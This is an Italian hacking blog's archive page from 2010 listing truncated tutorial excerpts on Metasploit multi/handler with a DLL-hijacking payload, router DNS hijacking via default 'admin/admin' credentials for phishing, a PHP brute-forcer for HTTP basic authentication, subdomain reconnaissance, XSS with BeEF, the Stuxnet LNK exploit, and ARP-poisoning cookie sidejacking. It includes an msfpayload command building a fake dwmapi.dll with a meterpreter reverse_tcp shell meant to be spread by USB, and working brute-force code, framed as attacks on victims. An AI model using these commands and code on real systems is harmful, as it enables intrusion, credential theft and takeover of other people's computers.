Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Archivio: ‘GNU/Linux’

[Metasploit] multi/handler :D

agosto 30th, 2010 by clshack

Sfruttando questa opzione di metasploit, possiamo mantenere in ascolto metasploit fino che il client non si connette al nostro server.

In poche parole, se mandiamo exploit in giro (ad esempio via usb) metasploit, resta in ascolto fino che l’utente non lo esegue…

Vediamo come attaccare firefox < = 3.6.8 con il DLL Hijacking e multi/handler di metasploit.

[info DLL Hijacking]

La dll che carica firefox all’esecuzione, è:
dwmapi.dll


Creiamo la falsa dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[Remote-Router]Fake DNS and Phishing/Exploiting attack

agosto 29th, 2010 by clshack

In pochissimi, cambiano la password al router -.-’ per comodità si lascia quella di default, quella facile da ricordare o.O

User: admin
Password: admin

In questo modo, se il router è raggiungibile dall’esterno, oppure se un utente, riesce ad entrare nella nostra rete può sfruttando i dns effettuare attacchi mirati verso il vostro il pc :D
Gli attacchi vanno dal phishing:
Wiki:

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging.

fino a per prendere il controllo remoto del pc vittima :D

Tutto questo sfruttando i dns.
Quando riusciamo ad entrare nei router, oltre a cambiare l’ssid del wifi in “Che stronzo che sie” / “Sei un merda” e stronzate varie possiamo cambiare i dns.
Ad esempio io ho quelli di google o.O

I server dns, volgarmente parlando, non fanno altro che restituire l’ip del sito internet a cui ci stiamo connettendo, ad esempio se digitiamo www.clshack.it:
; < <>> DiG 9.7.0-P1 < <>> www.clshack.it
;; global options: +cmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.it. IN A
;; ANSWER SECTION:
www.clshack.it. 31 IN A 94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE rcvd: 48
Ci restituisce:
94.141.22.26
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Programmazione, Software | 20 Comments »

[PHP]BruteForce Http basic authentication

agosto 25th, 2010 by clshack

Subito avevo scritto questo scanner in python, poi non riuscivo a gestire bene l’eccezzione httplib.badstatus e quindi ho converti lo scanner in php :D è è è esercizio :D

La configurazione dello scanner è ababstanza semplice, per l’autentificazione, ho usato i la libreria curl di php ;)

La funzione per fare un login in , con i curl è:

function authentication($ip,$user,$password)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL,$ip);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_NOBODY, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
	curl_setopt($ch,CURLOPT_USERPWD, "$user:$password");
	curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
	curl_exec($ch);
	$info =curl_getinfo($ch);
	curl_close ($ch);
	if($info["http_code"]=="200")
        {
		return 1;
        }
	else
        {
		return 0;
         }
}


Codice abbastanza semplice :D
(continua…)

Tags: , , ,
Posted in GNU/Linux, Programmazione, Software | 13 Comments »

[Tutorial]Fierce v2: Sub-Domain Scanner

agosto 7th, 2010 by clshack

Dal sito ufficiale, leggiamo:

Fierce Domain Scan was born out of a frustration while performing a web application security audit. It used to be very time-consuming to discover large swaths of a non-contiguous corporate network, but it doesn’t have to be. It’s terribly easy to run a scanner against an IP range, but if a network’s web presence is distributed across multiple ranges, you can miss huge chunks of networks. Fierce helps solve that problem.

Fierce is a reconnaissance tool written in Perl that quickly scans domains (usually in just a few minutes, assuming no network lag) using a variety of techniques to locate undocumented, internal or just hard-to-find resources via the DNS system.

In poche parole, è facile da usare, è scritto in perl, ed è molto potente :D
Ma a cosa ci serve ? o.O
A scoprire tutti i sotto domini dei siti vittima e altre informazioni utili :D ecc ecc ecc :D
Vediamo come installarlo e usarlo :D
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 8 Comments »

DOWNLOAD BackTrack 4 R1 – Public Release

agosto 5th, 2010 by clshack

Molte novità interessanti :D sopratutto:

full Fluxbox desktop environment has been added


Oltre al kernel aggiornato, a nuovi tools e ai nuovi driver disponibili :D
Changelog ufficiale:

  • Kernel 2.6.34 – With fragmentation patches, etc.
  • Updated tools, such as Maltego and SET.
  • Improved driver support, broader range of wireless cards supported.
  • Faster desktop experience due to kernel.
  • Fluxbox environment added.

DOWNLOAD

Tags: ,
Posted in GNU/Linux, Hacking, Software | 2 Comments »

XSS: MORE POWER WITH Beef and Metasploit

agosto 1st, 2010 by clshack

Panicoo, si avevo voglia di un titolo in inglese o.O

Vediamo oggi come attaccare un computer con metasploit, sfruttando un xss, assieme a BeEF(browser exploitation framework)


XSS WIKI:

Il Cross-site scripting (XSS) è una vulnerabilità che affligge siti web dinamici che impiegano un insufficiente controllo dell’input (parametri di richieste HTTP GET o contenuto di richieste HTTP POST). Un XSS permette ad un attaccante di inserire codice al fine di modificare il contenuto della pagina web visitata. In questo modo si potranno sottrarre dati sensibili presenti nel browser degli utenti che visiteranno successivamente quella pagina.

Bene, cominciamo :D
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 9 Comments »

[CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

luglio 28th, 2010 by clshack

Ne parlano quasi tutti, però non tutti sanno che è uscito il modulo, per sfruttare questo exploit con metasploit :D
Stuxnet, è un worm che si sta diffondendo sempre più velocemnte, sfruttando la vulnerabilità:CVE-2010-2568 che sfrutta una solita cattiva gestione dei file LNK di windows, permettendo ad attaccker di eseguire codice remoto sulla vittima, oppure propagando i file maligni tramite supporti rimovibili.


I prodotti vulnerabili, sono:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for Itanium-based Systems

Vediamo come sfruttare questa vulnerabilità con metasploit :D
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 17 Comments »

[Install]BackTrack USB Persistent Mode

luglio 27th, 2010 by clshack

Vediamo come installare backtrack in persistent mode su una chiavetta usb :D

Software necessario:
uNetBootIn:Installare facilmente distribuzioni Linux su USB.
E un partizionatore :D se siete pratici fate da terminale altrimenti più comodamente si può usare gparted.

Adesso partizioniamo la nostra chiavetta, (consiglio una da 4 GB).
Creiamo una partizione fat32 da 1.8 GB e chiamiamola come vogliamo ;)
Creiamo un’altra partizione, il restante spazio in ext3 e chiamiamola: casper-rw
(continua…)

Tags: , , ,
Posted in GNU/Linux, Software | 5 Comments »

Reverse connection | Share Desktop

luglio 20th, 2010 by clshack

In “hacking”, si sente spesso parlare di reverse shelle o bind shell .

Spiegazione rapida rapida:

La reverse shell,la più utilizzata, a differenza della bind shell, si connette a noi, ad una nostra porta aperta, fornendoci ad esempio un prompt di comandi.

Invece, la bind shell, cerca di aprirsi una porta sul computer stesso, dove noi ci andremo a connettere.

Ormai, però non funziona quasi più, poichè i pc sono quasi tutti dietro a router/firewall.

Guardano un po’ sul web, ho trovato una cosa molto bella :D
Condividere il desktop in reverse connection.
Cioè il client sta in ascolto e il server ci invia i dati :D

Vediamo come connetterci ad ubuntu da remoto, senza aprire la porta ad ubuntu :D


Questo tipo di connessione offre notevoli vantaggi, visto che non dovremo aprire porte sul firewall ubuntu, perciò un eventuale attaccker, non potrà vedere che abbiamo il server vnc attivo, e sfruttare eventuali vulnerabilità o tentando attacchi brute force o altre cose :D
(continua…)

Tags: , , ,
Posted in Articoli su GNU/Linux, GNU/Linux, Software | No Comments »

HTTP session hijacking with Ettercap and Hamster

luglio 18th, 2010 by clshack

Grazie ad ettercap, è possibile effettuare in semplicità attacchi arp poisoning.

Per ulteriori approfondimenti:
TUTORIAL

Hamster, è un tool, che estrae dai pacchetti catturati con wireshark, durante un attacco arp poisoning, tutti i cookie.

In questo modo, non essendo loggati, sfruttando il cookie della vittima, nel 90 % dei casi potremo usufruire delle pagine in cui è loggato, ad esempio gmail.

Dal sito ufficiale:

Hamster is a proxy server.
There are a couple ways sidejacking could work.
One way would be a browser add-on.
Another way would be as a proxy server.
The hacker would connect through the proxy, which would then rewrite the cookies on behalf of the hacker.
The following shows Hamster in action. On this screen, we see the web browser “console” screen.

Vediamo come utilizzarlo sul nostro ubuntino :D

Apriamo la nostra console o.O
sudo -s
wget http://www.clshack.it/nopaste/install_hamster.sh
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »
« Older Entries